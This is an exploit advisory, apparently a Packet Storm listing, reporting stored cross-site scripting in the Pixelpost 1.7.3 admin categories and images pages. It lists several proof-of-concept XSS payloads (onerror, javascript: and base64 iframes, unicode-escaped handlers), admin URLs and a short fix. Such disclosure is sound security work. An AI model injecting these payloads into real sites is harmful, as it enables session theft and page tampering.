Pixelpost version 1.7.3 suffers from a cross site scripting vulnerability.
b12ac8118bf09ea057609691a156e98a4c44163bd47842ab4492b16bad0c61bbExploit Title: pixelpost 1.7.3 Cross Site Scripting Vulnerabilities
# Date: 06/03/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link:http://www.pixelpost.org/
# Versions Affected: pixelpost 1.7.3
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerabilitie Description:
The Vulnerabilities in admin area categories options and many other place input in is not sanitized. Therefore it results
in a stored cross-site scripting
Pixelpost Description
Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by photobloggers who like to keep the
meaning behind photoblogging in mind, the photography, and not about the 311 hacks you would have to get through to get your regular blog to work
POC:
http://www.youtube.com/watch?v=afjIFOuXG38&feature=youtu.be
Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>
<iframe %00 src="	javascript:prompt(1)	"%00>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
http://demo.xxx.com/admin/index.php?view=categories
http://demo.xxx.com/http:/admin/index.php?
http://demo.xxx.com/http:/admin/index.php?view=images
##########################################################################################################
Fix:
Better sanitization by restricting special characters.
Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed